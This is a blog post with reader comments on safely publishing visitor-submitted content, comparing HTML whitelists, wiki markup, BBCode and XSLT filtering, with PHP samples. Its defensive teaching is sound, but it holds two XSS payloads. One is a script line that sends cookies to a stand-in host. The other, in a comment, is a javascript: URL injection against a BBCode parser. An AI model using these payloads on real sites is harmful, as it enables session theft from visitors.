Handling content from strangers

One thing that makes web development both fascinating and exhausting is how the same subjects keep popping up, over and over, without resulting in any clear answers. On the one hand it’s remarkably easy to put up your own website; on the other, building a site that can handle a lot of traffic and is easy to change and modify is not so easy.

What got me started is this recent blog entry by Sam Ruby – owner of the job to die for at IBM, the man PHP can thank for the Java extension, a member of the Apache Group, and a contributor to countless other web innovations and groups.

The issue? How to publish content submitted to your site by its visitors. This one is as old as that most dated of web apps – the Guestbook – and if you trawl through the comments on Sam’s site, you’ll quickly get the idea that, still, no one’s too sure of the answer.

The basic problem, as you no doubt know, is that to allow visitors to your blog or forum to submit more than just plain, unformatted text, you need to give them some kind of mechanism to add structure. But if you give them access to the entire HTML vocabulary (plus JavaScript and CSS), not only will your site be an ever-changing mess but you’ll also potentially be exposing visitors to things like XSS exploits (side note – Chris Shiflett: Foiling Cross-Site Attacks).
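
To make the risk concrete, here’s a minimal sketch – the payload and domain are invented for illustration:

    <?php
    // A naive guestbook that echoes submissions verbatim is an instant XSS
    // hole. A malicious visitor might submit something like:
    //
    //   <script>document.location='http://evil.example/?c='+document.cookie</script>
    //
    // and every later visitor to the page hands over their cookies.
    echo $_POST['comment']; // don't do this

    // The bare minimum defence is to escape everything:
    echo htmlspecialchars($_POST['comment']);
    ?>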

I’ve been developing a fetish recently for knocking up lists describing common development problems, as a means to really nail them down. Here’s a guess at what a good solution to this problem needs to do (subject to my opinion / limited vision):

Good Smells

1. Prevents the structure of your site from being broken

2. Poses no threat to your site’s or its visitors’ security

3. Provides visitors with enough power, in terms of how they are able to format their submissions, to be happy.

4. Is easy to parse (extracting submitted formatting and handling it should not require a PhD)

5. Is easy to use. Believe it or not, there are people “out there” who have no idea of HTML.

6. Preserves the intent of the formatting. Not quite sure how to explain what I mean here but the thought test might be: “Is it possible to transform submitted content to other output types?” – i.e. is generating a PDF document, as opposed to HTML, at least feasible.

Any more / less?

Meeting all those requirements is probably an impossibility – it’s going to be a compromise at some level.

Some of the common solutions to this, off the top of my head, are:

Common Styles

a. Allowing a limited subset of “safe” HTML. This addresses points 3. and 6. pretty well and, assuming a basic knowledge of HTML, places no additional requirements on users to learn new markup syntaxes. Also on the plus side (depending on your point of view), there are plenty of WYSIWYG “plugins” these days, such as Editize or JavaScript-based solutions. The downside is it’s very easy to get wrong, particularly in terms of security (see PHP’s strip_tags() function and the comments that follow on “evil attributes” – there’s a DOM-based sketch of attribute stripping after this list). The other problem is how to parse it. Unless you require users to submit well-formed XML, your standard XML parser will choke on HTML, and using regular expressions to parse HTML is often a recipe for nightmares. Most languages used on the web have evolved an HTML-capable parser or two by now, though. That said, it’s almost shocking that PHP, in particular, has come so far with essentially no built-in HTML parser (thankfully PHP5 brings HTML Tidy to the fray, plus the DOM extension can now handle HTML).

b. Wiki style. Using “markup” like *this for bold* and _this for italic_. Wiki style often starts out well, being easy to use and secure, but is perhaps weak on point 3., and things go downhill the more formatting options you provide to users – the parsing gets progressively harder to manage and the syntax weirder, like !!!this for some large text. Users are required to learn this alien markup and may find it difficult to express their precise formatting intent (intent thereby being lost or becoming arbitrary, as text like McDougals gets automatically assigned as a link to a new wiki page). In the end, I don’t think wikis do much to address those beyond their original target audience – software developers (flame on…)

c. Implied formatting. This is less frequently used as a standalone mechanism but turns up often as part of other styles. Essentially, whitespace takes on a meaning it doesn’t normally have with HTML – PHP offers nl2br(), for example. It’s definitely easy to use and fairly safe (depending on what you do with URLs, for example). It’s also easy to parse. Where it fails is it typically offers little power to the user, and it’s very easy to lose the intent of the formatting, hence it’s often augmented with one or more of the other styles.

d. BBCode style. Essentially use your own custom markup; one which will be ignored by web browsers completely, should any unparsed fragments turn up in the finished page. Although this can be a little tricky for users who have never run into it before, it’s a tried, tested and successful approach, as forum apps like vBulletin and phpBB have proved, to the point where BBCode is almost (an unwritten) standard. Surprisingly, on Sam’s blog, no one mentioned it, but perhaps that reflects the common divide between PHP developers and the rest of the web: doing it vs. talking about it. For end users, it generally means that basic HTML tags have been translated more or less one to one to BBCode – simply replace < with [ – so if you know HTML, you’ll probably be fairly happy. You also have the option, as Sitepoint have done, of introducing your own markup, like the “Google” tag. Parsing is bearable and formatting intent can be clearly expressed and preserved. For me, it’s the way to go, but that’s me (there’s a minimal sketch after this list, too).
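
As promised under a., a rough sketch of whitelist filtering with PHP5’s DOM extension – the allowed tags and attributes are invented examples, and a production version needs far more care:

    <?php
    // Sketch: whitelist-based filtering of "safe" HTML using PHP5's DOM
    // extension. The whitelists below are examples only.
    $allowedTags  = array('p', 'b', 'i', 'a', 'ul', 'ol', 'li');
    $allowedAttrs = array('a' => array('href'));

    $doc = new DOMDocument();
    @$doc->loadHTML('<div>' . $_POST['comment'] . '</div>'); // tolerant of tag soup

    $xpath = new DOMXPath($doc);
    foreach ($xpath->query('//body//*') as $node) {
        if (!in_array($node->nodeName, $allowedTags)) {
            // Replace a disallowed element with its plain text content
            $node->parentNode->replaceChild(
                $doc->createTextNode($node->textContent), $node);
        } else {
            // Strip any attribute not explicitly whitelisted ("evil attributes")
            $keep = isset($allowedAttrs[$node->nodeName])
                  ? $allowedAttrs[$node->nodeName] : array();
            for ($i = $node->attributes->length - 1; $i >= 0; $i--) {
                $attr = $node->attributes->item($i);
                if (!in_array($attr->name, $keep)) {
                    $node->removeAttribute($attr->name);
                }
            }
        }
    }
    // NB: even then, href values still need vetting (javascript: URLs etc.)
    ?>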
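
And the minimal BBCode sketch mentioned under d. – tag support is deliberately tiny and the function name is mine:

    <?php
    // Sketch: a deliberately minimal BBCode translator. Escaping everything
    // first means whatever isn't recognised BBCode stays harmless text.
    function bbcode_to_html($text)
    {
        $html = htmlspecialchars($text);
        $html = preg_replace('/\[b\](.*?)\[\/b\]/s', '<b>$1</b>', $html);
        $html = preg_replace('/\[i\](.*?)\[\/i\]/s', '<i>$1</i>', $html);
        // Only allow http:// URLs - no javascript: and friends
        $html = preg_replace(
            '/\[url=(http:\/\/[^\]\s]+)\](.*?)\[\/url\]/s',
            '<a href="$1">$2</a>', $html);
        return nl2br($html); // implied formatting (style c.) for linebreaks
    }

    echo bbcode_to_html($_POST['comment']);
    ?>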

Any more?

One notable hybrid of all of these is Textile markup, which throws in a little of everything. Those times I’ve been subjected to it, the result was “Yuck!”. Another hybrid seems to be Markdown.

Practical Notes

Couple of quick points, outside of security issues:

- When storing visitor-submitted content in a database, for later display, apply the parsing operations after the content has been stored, not before. In other words, don’t parse, INSERT then SELECT, but INSERT, SELECT then parse (if performance is an issue, cache the HTML resulting from the parse – see the sketch after this list). The basic reason for this is it makes editing the content later (either by you as a site admin or by the visitor themselves) easy – you display their content (more or less) as-is in a textarea, rather than having to reverse the parsing operation to give them back what they started with (a recipe for headaches). You also stand a better chance of preserving the intent of the formatting, which is easy to lose if you’re required to reverse the parsing. You might consider filtering the content before storing it – certainly for SQL injections and possibly for stuff like “bad word filters” – but don’t transform or add to the content.

- Document your markup. The number of blogs I see that expect visitors to guess (nudge nudge Sitepoint ;))…
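
The caching idea in code form – a sketch only; the table and column names are invented and error handling is omitted:

    <?php
    // On submit: escape for SQL, but store the raw markup untransformed.
    mysql_query(sprintf(
        "INSERT INTO comments (raw_content) VALUES ('%s')",
        mysql_real_escape_string($_POST['comment'])));

    // On display: parse late, and cache the parsed HTML if performance matters.
    $row = mysql_fetch_assoc(mysql_query(
        "SELECT id, raw_content, cached_html FROM comments WHERE id = 42"));
    if ($row['cached_html'] === null) {
        $html = bbcode_to_html($row['raw_content']); // or whatever parser you use
        mysql_query(sprintf(
            "UPDATE comments SET cached_html = '%s' WHERE id = %d",
            mysql_real_escape_string($html), $row['id']));
    } else {
        $html = $row['cached_html'];
    }
    echo $html;

    // On edit: hand the raw content straight back - no reverse parsing.
    echo '<textarea name="comment">'
       . htmlspecialchars($row['raw_content']) . '</textarea>';
    ?>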

Any more?

While I’m here, some PEAR projects that can help in this area:

- PEAR::HTML_BBCodeParser – you don’t even need to write your own (this has even become a WACT Tag). Note that stuff like converting HTML entities and handling linefeeds is still your job (see the sketch after this list).

- PEAR::Text_Wiki – in effect, an abstraction layer for wiki markup. Text_Wiki “captures” all the common document structuring requirements end users may have as “rules”, and can translate whatever markup you like to those rules, the rules rendering (X)HTML. Very clever project. Would also work as a BBCode parser (and pretty much anything else, in fact).

- XML_HTMLSax – a SAX parser which won’t choke on HTML (badly formed XML). In fact the name HTMLSax is a little misleading, as it has no specific knowledge of the HTML vocabulary – it’s much like Python’s HTMLParser, although tags which are closed implicitly, like <br />, result in a fourth argument to the open tag handler with XML_HTMLSax, as well as a call to the close handler, while Python’s HTMLParser has a “startendtag” callback for this situation. A couple of projects I’ve seen but never tried are HTML Parser for PHP-4, which provides a state-based API, and PHP HTML Parser, which does have some knowledge of HTML and seems to be designed to transform HTML in a single pass (from the user’s point of view). Note also Simple Test has a (you guessed it) simple SAX-based parser for HTML – it uses regular expressions, based on the Lexer in lamplib. I still need to benchmark it against HTMLSax, which uses a string-position-based approach to parsing, just for interest.
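
Going back to HTML_BBCodeParser for a second, usage looks roughly like this (note the entity and linefeed caveats above):

    <?php
    require_once 'HTML/BBCodeParser.php';

    $text = htmlspecialchars($_POST['comment']); // entities: your job
    $parser = new HTML_BBCodeParser();
    $parser->setText($text);
    $parser->parse();
    echo nl2br($parser->getParsed());            // linefeeds: also your job
    ?>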

Anyway – long rant. Enough already.


  • sleepeasy

    I was thinking about the very same thing while I was trying to get to sleep last night.

    What I thought of was using XML. Define a set of XML elements, probably a subset of XHTML elements. When the user submits his/her content, try and load it into DomDocument. If the content isn’t well-formed XML then that step will fail, and at that point notify the user that they had some errors in what they submitted. If it loads, good.

    Next, validate the XML using a very simple XSchema that defines the allowed elements (this XSchema could be extended or whatever to add supported elements as required).

    If this fails, notify the client (again); otherwise all is well – stick it in your database.

    I haven’t thought about it that much, but I think it could work this way.

    I hope :)

  • http://www.phppatterns.com HarryF

    What I thought of was using XML. Define a set of XML elements, probably a subset of XHTML elements

    One further problem with requiring well-formed XML, though: should users post like this;

    <?xml version="1.0"?>
    <a href="...">Here is a link</a>

    Or like this;

    <a href="...">Here is a link</a>

    You attach the XML processing instruction for them, but what they’re submitting is, technically, no longer well formed.

    And what about this;

    <a href="...">Here is a link</a>
    <a href="...">Here is another link</a>

    An XML document can only have one root node. The above implies you’re making the root node for them – what they’re submitting is even less well formed….

  • sleepeasy

    ” An XML document can only have one root node. The above implies you’re making the root node for them – what they’re submitting is even less well formed…. “

    OK, point taken – however the method I outlined above would still be viable:


    $message = new DomDocument('1.0');
    $content = '<content>' . $_POST['content'] . '</content>';
    $message->loadXML($content); // Catch any errors
    $message->schemaValidate('message.xsd'); // And again

    Personally, I would want to attach other (meta)data of some description along with the submitted content to form the “whole” message, ie. instead of simply:

    <content>content text here</content>

    I’d want:

    <message>
      <author>45</author>
      ...
      <content>content goes here</content>
    </message>

    $message = new DomDocument('1.0');
    $content = '<content>' . $_POST['content'] . '</content>';
    $message->loadXML($content); // Catch any errors
    $message->schemaValidate('message.xsd'); // And again

    $capsule = new DomDocument('1.0');
    $capsule->appendChild(new DomElement('message'));
    $capsule->documentElement->appendChild(new DomElement('author', Visitor::instance()->getId())); // ...
    $capsule->documentElement->appendChild($capsule->importNode($message->documentElement, TRUE));
    // Save or whatever.

    I don’t see ” making the root node for them ” as a problem.

    I think SitePoint should really make these textareas for the blog comments bigger. Or maybe they’re trying to tell me something :)

  • http://www.jeroenmulder.com/ JMulder

    What a coincidence! Not too long ago I had a discussion on this with a good friend, specifically about the ‘when’ of parsing the content.

    In his current project he built an encoding and a decoding method, encoding the user’s content before storing it in the database and decoding it whenever needed. This was done in the light of performance, which I can totally understand.

    I am in favour of parsing the content after selecting for the same reasons as you mentioned. Another reason is that to me it doesn’t sound right to store altered content in a database. I want to store the content as true as possible in the database and then worry about presentational matters later. Parsing before INSERT could give you problems if you wish to use two different methods for displaying the content (screen and print maybe?).

    I second the use of BBCode. It’s good stuff ;)

    Boy. Got to love comments that don’t make a point. I’ll end my ranting right now, it’s early in the morning :p

  • http://www.phppatterns.com HarryF

    I don’t see ” making the root node for them ” as a problem.

    Agreed it’s not a train smash but can be confusing to users in some cases. Believe Simon uses the approach on his blog, and may have some more insight.

    the ‘when’ of parsing the content

    Guess to an extent this is a contentious issue – my view is like yours – preserve the raw data and keep it simple. Has your friend considered caching the parsed content as a way to keep performance up?

  • Alec

    Maybe this is equivalent to what sleepeasy was saying, but you could allow html and process it with XSLT (creating the root node for them, of course). Then your xsl just needs to have statements reflecting the allowable tags and attributes.

    For instance, to allow a <b> tag you’d have (I’m supposed to use vB code here, right? nudge, nudge):

    <xsl:template match="b">
      <b><xsl:apply-templates/></b>
    </xsl:template>
    If someone submitted:

    <b>Hello there</b>

    it would stay the same, but if they submitted

    <b style="...">Hello there</b>

    the style attribute would be stripped out.

    To allow links, but only with full web-page urls (no ftp, no tricky javascript or relative links), you could use:

    <xsl:template match="a[starts-with(@href, 'http://')]">
      <a href="{@href}"><xsl:apply-templates/></a>
    </xsl:template>
    (I think: I only just started messing around with XSLT after installing php 5 the other day.)

    Basically any tags you don’t match are left out, as are any attributes you don’t match. If the input is so wild it won’t even parse, it’s because the user really messed something up, like not closing a tag: you tell them to try again. You could reduce that possibility by running Tidy on it first, too.

    I don’t like BBCode because it doesn’t seem to be any easier to use/learn than html and it doesn’t have any practical uses outside of posting to discussion boards. I feel like allowing html instead contributes to web-literacy or something. Also, I’m not convinced that the pear BBCode parser isn’t vulnerable to javascript insertion. At the least, it seems really easy to get some wacky output. You can try different things here:

    http://nautadereede.nl/parser/parser.php

  • http://www.sitepoint.com/ mmj

    By coincidence, I’ve been working on the same sort of problem just recently in a project of my own. When fitting a rich text editor into a form, I realised that I needed some way to ensure that the content submitted contained no script (javascript, etc) and no styles, and that it was XHTML strict compliant.

    Doing the first two alone is relatively easy, but for the third I built myself a complete HTML parser which is capable of ‘hinting’, that is – it assumes the input is nowhere near XHTML Strict compliant, and it goes through the document element by element converting it to its XHTML Strict equivalent. For an example of where ‘hinting’ is necessary, consider the fact that XHTML does not allow you to place text directly inside some tags, such as <body> or <blockquote>. Well, the script I wrote will hint this text by dropping it inside a paragraph element. This includes checking all elements and their children, and elements and their attributes, against the XHTML allowed children and allowed attributes. It also then goes over the document a couple of times to clean up things that we often do badly, like paragraph tags.

    It means that I can let a user submit any raw HTML he wants, and it will be filtered into nice strict XHTML. This negates the need for a more limited, informal markup such as a wiki markup or bbcode, and it means that users can post complex things like nested lists, tables, images, and whatever.

    The data that I store in the database is then valid XHTML, so when I want to display it, it needs no further parsing. However, because it is XML compliant, if I did want to further parse it, I can do it easily and quickly with the DOM or with XSLT. This is something that couldn’t be done with, say, bbcode. Having the data stored as valid XHTML makes all of this relatively easy. The notion of having a proprietary XML format with just limited tags makes sense too, but when the data being stored is essentially ‘formatted text’, then it makes more sense to use XHTML itself.

  • http://simon.incutio.com/ Skunk

    My blog enforces valid XHTML in the comments and restricts the user to a small subset of non-harmful tags and attributes. I get around the required root problem by wrapping entries in a made-up element before validating them, and in another element when they are displayed on the page. Of course, this means I don’t have valid XML in the database table for entries without a root element, which isn’t really a problem but does rule out the possibility of running crazy XML database extensions in the future. That said, it’s a ten minute job to write a script that goes through my database and adds a root node around everything, so it isn’t really a problem.

    From a usability point of view, this solution is terrible. I can almost get away with it because my blog is very much skewed towards standards based web development and I can safely assume most of my readers will know HTML. Even so, I still lose comments – just a few days ago someone was trying to post a code sample with an unescaped ampersand in it, couldn’t figure out why it wouldn’t let him, and gave up. That’s just not acceptable and making my system less draconian (while still ensuring I end up with well formed XHTML) has been added to my to-do list.

    There are enough solutions to the how-to-accept-user-input problem that sites should be able to pick one that fits their needs. The absolute simplest is just to escape all user input using htmlspecialchars() (or equivalent) – and not doing so is inexcusable as it’s an instant cross site scripting vulnerability.

    Great discussion!

  • http://www.phppatterns.com HarryF

    [QUOTE=Anonymous]
    Basically any tags you don’t match are left out, as are any attributes you don’t match. If the input is so wild it won’t even parse, it’s because the user really messed something up, like not closing a tag: you tell them to try again. You could reduce that possibility by running Tidy on it first, too.
    [/QUOTE]

    Very cool tip.

    I don’t like BBCode because it doesn’t seem to be any easier to use/learn than html and it doesn’t have any practical uses outside of posting to discussion boards. I feel like allowing html instead contributes to web-literacy or something.

    Can see your angle. As you spotted (nudge nudge SP), this blog uses BBCode though, and generates respectable enough XHTML. For me BBCode works well when you need an easy to implement solution that (should) be reliable, secure and preserves the formatting intent (so you can make XHTML out of it).

    But your idea with Tidy + XSLT is excellent – may be the way to go with PHP5: sloppy HTML is still possible for the user but the result is XHTML.
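
    Something along these lines, perhaps – a sketch only, with whitelist.xsl being a hypothetical stylesheet in the style you described:

    <?php
    // Repair the tag soup with Tidy, then filter it through a whitelisting
    // XSL stylesheet (whitelist.xsl is hypothetical)
    $tidy = tidy_parse_string($_POST['comment'], array(
        'output-xhtml'     => true,
        'show-body-only'   => true,
        'numeric-entities' => true, // so loadXML() won't choke on &nbsp; etc.
    ));
    $tidy->cleanRepair();

    $doc = new DOMDocument();
    $doc->loadXML('<div>' . tidy_get_output($tidy) . '</div>'); // one root node

    $xsl = new DOMDocument();
    $xsl->load('whitelist.xsl');
    $proc = new XSLTProcessor();
    $proc->importStylesheet($xsl);
    echo $proc->transformToXML($doc);
    ?>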

    Also, I’m not convinced that the pear BBCode parser isn’t vulnerable to javascript insertion. At the least, it seems really easy to get some wacky output.

    That’s also what I’m referring to about PHP developers “doing it” instead of talking about it (myself included).

    Just been checking and you’re right – try the following BBCode on that test page;


    // Replace { } with BBcode brackets...
    {url=javascript:location.replace("http://www.google.com/search?q="+document.domain);}Test{/url}

    Replace “document.domain” with “document.cookie” and XSS here we come… Someone needs to get to the author on that. Note the other weirdness is the example page doesn’t replace XML entities – he leaves that up to you, the class’s user (which may also be the angle on filtering for XSS).

  • Moritz Angermann

    Parse it all with XSL! :)

    I’ve written (basically inspired by this article, and because I was looking for some solution for my site: http://mdot.mine.nu) a Plain-Text-Markup-Parser in XSL.

    It takes text in the Markdown and Textism style and transforms it into valid HTML.

    More can be found here:
    http://mdot.mine.nu/projects/mml/

    kindest regards,
    Moritz “neofeed” Angermann


  • Chris

    Time to end the bold.

  • Chris

    Oh well. I tried.